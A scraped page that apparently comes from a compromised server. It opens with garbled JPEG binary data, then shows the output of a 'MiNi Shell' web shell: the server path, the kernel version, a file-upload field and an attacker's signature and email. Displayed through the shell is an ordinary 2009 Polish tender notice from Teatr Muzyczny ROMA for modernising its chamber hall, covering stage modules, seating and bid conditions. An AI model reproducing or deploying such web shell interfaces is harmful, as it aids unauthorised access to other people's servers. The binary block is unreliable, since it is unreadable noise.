JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090714/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090714/111635-N-2009.html

<p class="kh_header"><b>Warszawa: Modernizacja Sali Kameralnej w Teatrze Muzycznym ROMA w Warszawie</b><br>
<b>Numer ogłoszenia: 111635 - 2009; data zamieszczenia: 14.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Teatr Muzyczny ROMA w Warszawie , ul. Nowogrodzka 49, 00-695 Warszawa, woj. mazowieckie, tel. 022 6287071, faks 022 6217233.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://teatrroma.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> Nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Samorządowa instytucja kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja Sali Kameralnej w Teatrze Muzycznym ROMA w Warszawie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest modernizacja Sali Kameralnej w obiekcje Teatru Muzycznego ROMA polegająca w szczególności na:
1. Modernizacji Sali Kameralnej:
    1.1 -  Konstrukcja  widowni.
    1.2 -  Konstrukcja  sceny.
2. Dostawie i zamontowaniu sztankietów do podwieszenia scenografii nad sceną i widownią, aparatów oświetleniowych, oraz podwieszenia nagłośnienia.
3. Dostawa i montaż foteli teatralnych na widownię.

Ad. 1 Modernizacja Sali Kameralnej.
Modernizacja Sali Kameralnej polega na tzw. wstawieniu po przekątnej pomieszczenia składanej konstrukcji sceny i widowni. Scena będzie zajmować jeden z narożników pomieszczenia. Do Sali prowadzi bezpośrednie wejście z hallu. Naprzeciw sceny zbudowana zostanie widownia dopasowana amfiteatralnie do dwóch ścian i usytuowanej w narożu kabiny elektryczno-akustycznej. Na sześciu poziomach, każdy o wysokości 34 cm. zamontowane zostaną fotele w liczbie 151 sztuk. Widzowie z poziomu hallu (przez oddzielne wejście) do swych miejsc dochodzić będą przejściem między sceną, a pierwszym podestem oraz dwoma dojściami po schodach o wysokości  ?  podestu tj. 17 cm.

Wymagania: 
-  obciążenie użytkowe sceny - ludzie, instrumenty i dekoracje p1 = 5kN/m2 (500 kg/m2).
-  obciążenie użytkowe widowni - ludzie i fotele p2 = 3Kn/m2 (300 kg/m2).
-  łatwy montaż, demontaż i transport.
-  niepalna konstrukcja nośna.
-  niezapalna podłoga ze sklejki REI 30.
-  niepalna wykładzina podłogowa.

Ad. 1.1 Konstrukcja widowni:
Konstrukcja widowni powinna składać się w pełni demontowalnych modułów o takiej samej budowie, ale o zróżnicowanych wymiarach. 	Podesty powinny stać w sześciu 
rzędach i posiadać wysokości stopniowaną co 34 cm. zaczynającą się od wysokości 34 cm., a kończącą się na wysokości 204 cm. Każdy moduł w przekroju przypomina kształtem odwróconą literę L.
Podstawowy prostokąt modułu powinien być wykonany z zespawanych ze sobą profili stalowych:
-  z poziomej obwodowej ramy z dwoma usztywniającymi poprzeczkami z ceownika       C 60 x 30 x 3 mm.
-  z dwóch nóg z rury 50 x 30 x 3 mm. opartych na stopkach z blachy 4 x 100 x 100 mm. mocowanych lokalnie do podłogi.
Nogi będą podpierać zewnętrzny (od strony widowni), podłużny element ramy przewieszony z obu stron po 40 cm. Z drugiej strony rama modułu będzie mocowana do poprzeczki podporowej przyspawanej do nóg wyższego modułu lub do ceownika przykręcanego na kołki do ściany.
W poziomie każdego podestu ramy sąsiednich modułów będą skręcane ze sobą. Po zmontowaniu całej konstrukcji widowni i dokonaniu prób stateczności możliwa będzie konieczność wprowadzenia stężeń ukośnych z prętów O 10 mm.
Od góry do ramy będzie przykręcony blat podestu ze sklejki ognioodpornej o grubości 22 mm. Od przodu modułu, pionowo, o wysokości stopnia tj. 34 cm. dokręcona zostanie sklejka tworząc podstopnicę. Na sklejce rozkładana będzie wykładzina podłogowa o trudno zapalna o odpowiednich parametrach ( kolor wykładziny ustala Zamawiający ).
Na zmontowanej i pokrytej wykładziną widowni, na poszczególnych poziomach mocowane będą fotele. Po dokładnym ustawieniu foteli otwory pod ich stopki wiercone będą od góry (przez wykładzinę, sklejkę i wymiany stalowe). Jako wymiany pod fotele przyjęto podłużne kątowniki L 40 x 20 x 3 mm.
Największy i najcięższy prostokątny tzw. potrójny moduł M1.5 a o wysokości 204 cm., szerokości 250 cm. i głębokości 90 cm., obity sklejką nie powinien przekroczyć masy 105 kg.
Najczęściej stosowany ( około 80 % ) prostokąt, tzw. potrójny  moduł np. M1.4 o wysokości 170 cm., szerokości 250 cm. i głębokości 90 cm. ,obity sklejką nie powinien przekroczyć masy 96 kg.
Masa elementów pojedynczych i uzupełniających, obitych sklejką nie powinna przekroczyć masy 65 kg. 
Obciążenie użytkowe widowni - ludzie i fotele p2 = 3Kn/m2 ( 300 kg/m2 ). Konstrukcja widowni powinna spełniać wymogi prawa, w szczególności przepisów Prawa Budowlanego i Rozporządzenia Ministra Kulturyi Sztuki z dnia 2 września 1982 r.  w sprawie bezpieczeństwa i higieny pracy w instytucjach artystycznych                               ( DZ. U. nr. 29, poz. 205 ).
Każdy podest od czoła powinien posiadać kratkę wentylacyjną  ( wygląd i rodzaj kratki wentylacyjnej konsultować należy z Zamawiającym ).
Wszystkie krawędzie podestów i schodów powinny być zakończone kątownikiem aluminiowym profilowanym pomalowanym proszkowo w kolorze czarnym 
uniemożliwiającym ewentualnym odklejeniu się wykładziny i zapobieganiu poślizgu się na nim obuwia.
Balustrada powinna spełniać wymogi przepisów prawa, w szczególności Przepisów 
Prawa Budowlanego. Wygląd i sposób montażu musi być skonsultowany  z 
przedstawicielem Zleceniodawcy.
Na w/w moduły i balustradę powinna być dostarczona dokumentacja montażu i demontażu, dokumentacja obciążeń dynamicznych i statycznych na pojedyncze moduły jak i na całą widownię.
Dokumentację obciążeń dynamicznych i statycznych musi wykonać osoba lub firma posiadająca stosowne uprawnienia.

Ad. 1.2 Konstrukcja sceny:
Konstrukcja sceny powinna składać się w pełni demontowalnych modułów o takiej samej budowie jak dla widowni ( o stałej wysokości 45 cm. ), ale o zróżnicowanych wymiarach.
Każdy moduł w przekroju przypomina kształtem odwróconą literą L. 
Podstawowy prostokątny moduł powinien być wykonany z zespawanych ze sobą profili stalowych:
-  z poziomej obwodowej ramy z dwoma usztywniającymi poprzeczkami z ceownika      C 60 x 30 x 3 mm.
-  z dwóch nóg z rury 50 x 30 x 3 mm. opartych i mocowanych lokalnie do podłogi.
Nogi będą podpierać zewnętrzny ( od strony widowni ), podłużny element ramy powieszony z obu stron po 50 cm. Z drugiej rama modułu będzie mocowana do poprzeczki podporowej przyspawanej do nóg poprzecznego modułu lub ściany.
Ramy sąsiednich modułów będą skręcane ze sobą. Zaleca się wprowadzenie stężeń ukośnych z prętów O 10 mm. między  modułami.
Od góry do ramy każdego modułu będą pojedynczo ułożone na wpust - pióro, mocowane i kolejno ponumerowane do każdego modułu deski. Przed ułożeniem desek, deski powinny być zaimpregnowane obustronnie środkiem przeciwogniowym udokumentowanym Zamawiającemu protokołem impregnacji.
Deski ułożone powinny być wzdłuż widowni i pomalowane czarną farbą trudno zapalną o normie DIN 4102-B1.Obciążenie użytkowe sceny, instrumenty i dekoracje nie może być mniejszy niż p1 = 5kN/m2 ( 500 kg/m2). 
 Najczęściej stosowany prostokątny, tzw. potrójny moduł sceniczny np. S1 o wysokości 45 cm., szerokości 250 cm. i głębokości 100 cm., obity sklejką nie powinien przekroczyć masy 70 kg. 
Masa elementów pojedynczych i uzupełniających nie powinna przekroczyć masy 35 kg.
Od przodu modułu, powinna być dokręcona sklejka tworząca podstopnice. Na sklejce umocowana będzie wykładzina podłogowa trudno zapalna o odpowiednich parametrach ( kolor wykładziny ustala Zamawiający ). 
Wszystkie krawędzie sceny i znajdujących się na niej, lub obok schodów powinny być zakończone kątownikiem aluminiowym profilowanym pomalowanym proszkowo w kolorze czarnym uniemożliwiającym ewentualnym odklejeniu się wykładziny i zapobieganiu poślizgu się na nim obuwia.
Scena powinna posiadać kratkę wentylacyjną  ( wygląd i rodzaj kratki wentylacyjnej i miejsce jej umieszczenia konsultować z Zamawiającym ).
Na w/w moduły powinna być dostarczona dokumentacja montażu i demontażu, 
dokumentacja obciążeń dynamicznych i statycznych na pojedyncze moduły jak i na całą widownię.
Dokumentację obciążeń dynamicznych i statycznych musi wykonać osoba lub firma posiadająca uprawnienia.

Ad. 2. Sztankiety: 
Sztankiety znajdujące się nad sceną i widownią wykonane z rury bezszwowej o średnicy 50 mm. i grubości ścianki minimum 4 mm. Sztankiety należy mocować do boku żebra stropu kasetonowego zgodnie z rysunkiem w dokumentacji (ekspertyza techniczna) dostarczonej przez Zamawiającego. Rozstaw podpór pod sztankiety nie może przekroczyć 2,0 metry a długość wspornika sztankietu nie może przekraczać 1,5 metra. Ramię mimośrodowego obciążenia sztankietu nie może być dłuższe niż 30 cm. 
Rura powinna posiadać atest hutniczy i stosowną dokumentację określającą możliwości obciążenia dynamicznego i statycznego, oraz udźwig maksymalny do danego sztankietu wykonany przez uprawnioną firmę lub osobę.

Ad. 3. Fotele: 
Przedmiotem niniejszego zamówienia jest dostawa wraz z montażem 151 sztuk foteli teatralnych do Sali Kameralnej Teatru Muzycznego ROMA w Warszawie, spełniających aktualne wymogi przeciwpożarowe i BHP o następujących parametrach:
- Konstrukcja nośna fotela: wykonana z zamkniętych profili metalowych, zapewniająca fotelom trwałość konstrukcyjną, malowana proszkowo w kolorze z palety RAL (zostanie wskazana przez Zamawiającego), nie dopuszcza się elementów konstrukcyjnych z drewna i ze sklejki. Fotele muszą posiadać atest wytrzymałościowy według normy      PN-EN 
- Siedzisko i oparcie: formatki oparcia i siedziska wykonane w technologii wtrysku z formy z wysokogatunkowej trudno zapalnej pianki PU z zatapianymi wewnątrz metalowymi stelażami stanowiącymi konstrukcję nośną pianek - nie dopuszcza się pianek ciętych z boku. 
- Tapicerka: pokrowce do ściągnięcia z zamkiem błyskawicznym, tkanina trudno zapalna 100% poliester z barierową pianką trudno zapalną ( kolor tapicerki do uzgodnienia z Zamawiającym ). 
- Podłokietniki: konstrukcja nośna wykonana z odlewów aluminiowych, malowane proszkowo w kolorze z palety RAL zgodnie z kolorem konstrukcji nośnej, podłokietnik wykończony w górnej części wkładkami z litego drewna.
- Osłona oparcia: profilowana sklejka wygięta w formie lekkiego kubełka.
- Osłona siedziska: sklejka  prosta.
- Mechanizm składania siedziska, oparcia i podłokietników: samoczynny              (grawitacyjny), zintegrowany ze składanymi podłokietnikami i oparciem do pozycji pionowej. 
- Wymiary fotela: 
- wysokość fotela po złożeniu  nie mniej niż 84 cm, - nie więcj niż  86 cm ; 
- głębokość fotela po złożeniu siedziska nie mniej niż 18 cm, - nie więcej niż 20 cm;
- wysokość fotela po rozłożeniu nie mniej niż 84 cm, - nie więcej niż 86 cm;
- moduł fotela w osiach 52 cm;
- głębokość fotela po rozłożeniu siedziska maksymalnie 65 cm;                     
- formatka oparcia z pianki PU wyższa od formatki siedziska o 125 mm / wymiar podany przy złożonym fotelu /.
- Numeracja: miejsc arabska umieszczona z tyłu oparcia  na prostokącie wykonanym z tworzywa sztucznego, numeracja rzędów rzymska umieszczona na skrajnych elementach konstrukcji wsporczej pod podłokietniki,
- Atesty: fotele muszą posiadać wymagane atesty na wszystkie elementy fotela ( układ tapicerski, podłokietniki, drewniane osłony ze sklejki ), wydane przez akredytowane jednostki wg PN: trudno zapalności - według normy PN-EN, nie wydzielania bardzo toksycznych produktów rozkładu i spalania - według normy PN-EN, wytrzymałości i bezpieczeństwa rozwiązań konstrukcyjnych foteli - według normy PN-EN.
Atesty są niezbędnymi dokumentami do złożenia oferty.
- Montaż i demontaż: fotele z możliwością szybkiego montażu i demontażu w następujących konfiguracjach:
- 1 rząd 4 - 6 foteli.
- 2 rząd 5 - 6 - 8 foteli.
- 3 rząd 7 - 7 - 8 foteli.
- 4 rząd 8 - 8 - 9 foteli.
- 5 rząd 10 - 9 - 10 foteli.
- 6 rząd 12 - 11 foteli.
- 7 rząd 14 - 9 foteli.
- Fotele będą montowane w systemie jeden podłokietnik w fotelach w rzędzie, skrajne fotele zakończone podłokietnikiem. Rzędy proste bez łuku, ustawione po dwóch stronach sceny. Montaż (ustawienie) jednego rzędu bezpośrednio na podłodze widowni sceny kameralnej (4 i 6 foteli) oraz na widowni zbudowanej z podestów scenicznych o wymiarach 250 cm x 90 cm. ( moduł M1.5a ) i 250 cm x 108 cm ( moduł M1.4 ) ustawionych po 6 podestów w rzędzie, na których montowane będą fotele w konfiguracji: 10 foteli w 1 rzędzie,19 foteli w drugim rzędzie,22 fotele w trzecim rzędzie, 25 foteli w czwartym rzędzie, 29 foteli w piątym rzędzie, 23 fotele w szóstym rzędzie i 23 fotele w siódmym rzędzie  z zachowaniem dwóch skrajnych przejść.


W ramach zamówienia Wykonawca zobowiązany jest:
- dostarczyć na własny koszt przedmiot niniejszego zamówienia do siedziby Zamawiającego, sprzęt powinien być fabrycznie nowy i wolny od wad fizycznych i prawnych,
- dokonać przekazania przedmiotu umowy wraz z niezbędnymi dokumentami w siedzibie Zamawiającego na podstawie protokołu odbioru,
- udzielić 24-miesięcznej gwarancji, zapewnić możliwość sprawnego kontaktu z serwisem gwarancyjnym, a w czasie trwania gwarancji dokonywać wszelkich napraw w siedzibie Zamawiającego, a jeżeli zachodzi konieczność dokonania naprawy poza siedzibą Zamawiającego - pokrywać koszty transportu z siedziby Zamawiającego do serwisu i z powrotem,
- wszelkie prace i naprawy muszą odbywać się w terminach uzgodnionych z  Zamawiającym tak by nie kolidowały z bieżącą działalnością Teatru,
- dołączyć do oferty rysunek techniczny oraz model prezentacyjny oferowanego fotela,
- przeprowadzić szkolenie pracowników Zamawiającego w zakresie szybkiego montażu i demontażu foteli.

Zamawiający zaleca dokonanie wizji lokalnej w miejscu montażu foteli.

Wszystkie czynności należy wykonać zgodnie z zasadami wiedzy technicznej, pod nadzorem osób posiadających odpowiednie uprawnienia. 
Wszystkie  prace  powinny  być  wykonane zgodnie z obowiązującymi przepisami prawa a w szczególności przepisami prawa budowlanego  w obiektach budowlanych i Rozporządzeniem Ministra Kultury i Sztuki z dnia 2 września 1982 r. w sprawie bezpieczeństwa i higieny pracy w instytucjach artystycznych (Dz. U. nr 29, poz. 205), oraz Polskimi Normami.

Wykonawca będzie zobowiązany do zachowania najwyższej staranności przy wykonaniu zadania, usterki i szkody powstałe w trakcie realizacji zadania będą usuwane natychmiast po ich powstaniu przez Wykonawcę na Jego koszt.

Wykonawca będzie zobowiązany do ochrony mienia, przestrzegania przepisów BHP i ppoż., zabezpieczenia pomieszczeń we własnym zakresie, utrzymania porządku w trakcie realizacji prac oraz po ich zakończeniu.

Wykonawca będzie zobowiązany do przestrzegania regulaminu wewnętrznego obowiązującego na terenie Zamawiającego oraz uzgodnienia z Zamawiającym harmonogramu godzin pracy w Obiekcie.

Prace prowadzone przez Wykonawcę będą nadzorowane przez inspektora nadzoru wskazanego przez Zamawiającego.

Prace powinny przebiegać w sposób nie zakłócający pracy Zamawiającego.  Wykonawca przyjmie na siebie obowiązek wykonywania prac o dużym stopniu uciążliwości (np.: odłączenie zasilania energetycznego, duży hałas itp.), zgodnie z ustalonym wcześniej przez strony harmonogramem prac.

Wykonawca zobowiąże się do ubezpieczenia prac z tytułu szkód, które mogą zaistnieć w okresie od rozpoczęcia do przekazania przedmiotu umowy Zamawiającemu. Ubezpieczenie powinno obejmować szkody wynikłe w związku ze zdarzeniami losowymi i odpowiedzialnością cywilną Wykonawcy.

Wykonawca wraz z ofertą zobowiązany jest dostarczyć oferowany fotel teatralny. Po dokonaniu oceny ofert Zamawiający, na żądanie Wykonawcy, zwróci dostarczone fotele. Wykonawca będzie zobowiązany do montażu takich samych foteli jak dostarczone wraz z ofertą w ramach realizacji przedmiotowego zamówienia. zamówienia

Szczegółowy zakres modernizacji został określony ponadto w schematach oraz rysunkach modernizacji oraz ekspertyzie technicznej Sali, które stanowią załącznik do SIWZ. Dokumenty zostały załączone do SIWZ w wersji elektronicznej, w formacie ogólnodostępnym PDF.

Wykonanie adaptacji musi być zgodne z ekspertyzą techniczną i pozwalać na bezpieczne korzystanie z przedmiotu zamówienia przez obsługę Zamawiającego i osoby trzecie..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 44.21.00.00-5, 45.22.31.00-7, 39.11.31.00-8, 51.51.11.00-8, 44.11.56.00-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 25.09.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Zgodnie z art. 22 Ustawy, o udzielenie Zamówienia mogą ubiegać się Wykonawcy, którzy:
1)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
3)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
4)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia

Ocena spełnienia warunków udziału w postępowaniu nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów i oświadczeń.

Ocena spełnienia wyżej określonych warunków odbędzie się wg formuły: spełnia - nie spełnia. Nie spełnienie chociażby jednego warunku udziału w postępowaniu skutkować będzie wykluczeniem Wykonawcy z postępowania.

Dokumenty powinny zostać dostarczone w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę. Oświadczenia Wykonawcy składają wyłącznie w formie oryginału.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. W celu potwierdzenia, że Wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych, Zamawiający żąda następujących dokumentów:

a. aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

2. W celu potwierdzenia opisanego przez Zamawiającego warunku posiadania przez Wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, Zamawiający żąda:

a. wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, usług lub dostaw w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługom lub dostawom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączenia dokumentów potwierdzających, że te usługi lub dostawy zostały wykonane należycie.

Zamawiający wymaga wykazania co najmniej jednej dostawy lub usługi o podobnym charakterze do przedmiotu zamówienia o wartości nie mniejszej niż 100 000 zł netto.

Przez usługi lub dostawy o podobnym charakterze tj. odpowiadające swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, Zamawiający rozumie modernizacje sal widowiskowych w placówkach typu teatry, muzea, domy kultury.

Zamawiający żąda załączenia do oferty dokumentów potwierdzających, że wykazane usługi zostały wykonane należycie. 

3. W celu potwierdzenia spełnienia warunków udziału w postępowaniu opisanych w art. 22 ustawy Prawo zamówień publicznych, Zamawiający żąda:

a.  przedstawienia oświadczenia potwierdzającego spełnienie warunków udziału w postępowaniu zgodnie z art. 22 ustawy Prawo zamówień publicznych.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 80</li>
<li>2 - Jakość i ergonomiczność oferowanych foteli - 20</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://teatrroma.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Sekretariat Teatru Muzycznego ROMA w Warszawie, ul. Nowogrodzka 49,  00-695 Warszawa. Sekretariat Teatru pracuje od poniedziałku do piątku w godzinach 9:00-17:00..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.07.2009 godzina 13:00, miejsce: Sekretariat Teatru Muzycznego ROMA w Warszawie, ul. Nowogrodzka 49,  00-695 Warszawa. Sekretariat Teatru pracuje od poniedziałku do piątku w godzinach 9:00-17:00..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com